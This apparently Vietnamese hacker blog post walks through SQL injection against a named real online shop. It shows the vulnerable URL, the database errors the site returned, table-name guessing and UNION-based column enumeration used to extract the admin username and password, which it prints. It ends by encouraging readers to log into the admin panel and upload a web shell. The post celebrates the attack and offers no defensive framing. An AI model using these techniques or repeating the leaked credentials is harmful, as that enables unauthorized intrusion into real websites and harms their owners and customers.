site victim: http://hoffmans.co.za/shopdisplayproducts.asp?id=1%27
|
Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ‘ccategory = 1′ Order By specialOffer DESC, cname’. /shop$db.asp, line 831 |
Ta tiến hành khai thác và suy doán table nào đúng trong shop nhé !
Oh yeah ! ta có tbluser nằm trong shop roài !
|
Products Microsoft OLE DB Provider for ODBC Drivers error ’80004005′ [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 831 |
Nếu mà như thế này AE phải tìm tablename khác cho chuẩn nha !
|
Products
Microsoft OLE DB Provider for ODBC Drivers error ’80040e37′ [Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query ‘tbluse’. Make sure it exists and that its name is spelled correctly. /shop$db.asp, line 831 |
Như vậy là đã không hack được lỗi này vì ko phải tablename cua shop :shower:
Ta khai thác tiếp lỗi ở phía trên nhé !
AE cứ thay đổi lần lượt từ 1,2,3…30 ! shop nay tìm đến column mới hiện ra column chứa username/password !
khai thác ra đây:
http://hoffmans.co.za/shopdisplaypro…from%20tbluser
Ta nhìn thấy :
|
3
click to see more 21 |
Vậy ta tìm username/password ở cột số 3 nhé
http://hoffmans.co.za/shopdisplaypro…from%20tbluser
thay the : fldusername+’/'+fldpassword de lay user/pass admin nha !
OH hay thật có username/password của admin rồi đây :huncai:
| mike/sweet |
bây giờ đi kiếm link admin để login nao
giờ thì chúng ta váo shop làm tình làm tội nó 1 tý ! up shell local chẳng hạn !
Leave a Reply
You must be logged in to post a comment.